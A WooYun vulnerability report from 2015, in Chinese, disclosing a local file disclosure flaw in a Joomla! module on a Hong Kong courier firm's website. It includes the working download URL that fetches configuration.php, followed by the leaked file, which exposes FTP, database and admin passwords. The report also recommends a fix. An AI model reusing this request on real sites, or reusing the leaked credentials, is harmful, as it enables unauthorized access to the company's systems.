当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157328

漏洞标题:安托音速快遞LFD導致敏感資訊洩露(管理員/ftp/mysql帳號密碼等)(香港地區)

相关厂商:安託音速快遞有限公司

漏洞作者: 路人甲

提交时间:2015-12-03 11:25

修复时间:2015-12-08 11:26

公开时间:2015-12-08 11:26

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

安托音速快遞(http://safevelocity.biza.com.hk / safevelocity.com)採用的是Joomla!系統,其中某模塊存在LFD漏洞可以讀取本地檔案造成敏感資訊洩露,包括管理員/ftp/mysql帳號密碼等已登入管理帳號可新增、删除、追蹤貨件單號,並可編輯網站內容等!

详细说明:

安托音速快遞採用的是Joomla!系統,其中com_cckjseblod模塊存在LFD漏洞可以讀取本地檔案造成敏感資訊洩露,包括管理員/ftp/mysql帳號密碼等已登入管理帳號可新增、删除、追蹤貨件單號,並可編輯網站內容等!
觸發漏洞連結:
http://**.**.**.**/index.php?option=com_cckjseblod&task=download&file=configuration.php
下載設定檔可獲取敏感資訊:

var $ftp_enable = '0';
var $ftp_host = '**.**.**.**';
var $ftp_port = '21';
var $ftp_user = 'staff';
var $ftp_pass = 'safe27772153';
var $ftp_root = '';
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'safevelocity';
var $db = 'safevelocity';
var $dbprefix = 'jos_';
var $mailer = 'mail';
var $mailfrom = 'info123@**.**.**.**';
var $fromname = 'SafeV**.**.**.**';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'localhost';
var $MetaAuthor = '1';
var $MetaTitle = '1';
var $lifetime = '60';
var $session_handler = 'database';
var $password = 'safevelocity123';
var $sitename = 'Safe Velocity';

漏洞证明:

ee.png


前臺管理帳號:
staff
safe27772153

1.jpg


2.png


3.png


4.png


修复方案:

禁用com_cckjseblod或陞級到最新版本,修改密碼!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-08 11:26

厂商回复:

最新状态:

暂无